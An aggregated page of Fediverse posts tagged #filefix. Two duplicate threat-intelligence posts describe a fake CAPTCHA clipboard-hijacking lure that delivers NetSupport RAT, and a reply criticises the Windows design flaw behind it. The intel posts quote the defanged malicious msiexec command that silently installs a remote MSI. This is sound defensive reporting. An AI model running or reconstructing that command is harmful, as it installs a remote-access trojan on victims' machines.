home.social
Sign in Create account

#filefix — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #filefix, aggregated by home.social.

  1. Brad @[email protected] ·

    2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

    #smartapesg #filefix #clickfix #kongtuke #netsupportrat #clipboardhijacking
  2. Brad @[email protected] ·

    2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

    #clipboardhijacking #smartapesg #filefix #clickfix #kongtuke #netsupportrat
  3. David @[email protected] ·

    @campuscodi The "#FileFix" technique has an nonsensical name, but the design decision by #Microsoft which makes it possible is absolutely ridiculous. It at least makes sense to let the user run an executable from in the "Run" dialog; letting the user run an executable from the Location bar makes no sense. What conceivable use case did some engineer have in mind? Or did they just re-use an API without thinking?

    They implemented a security defect by design, by violating the Principle of Least Astonishment. Microsoft never ceases to amaze.

    en.wikipedia.org/wiki/Principl

    #humanFactor #POLA

    #filefix #microsoft #humanfactor #pola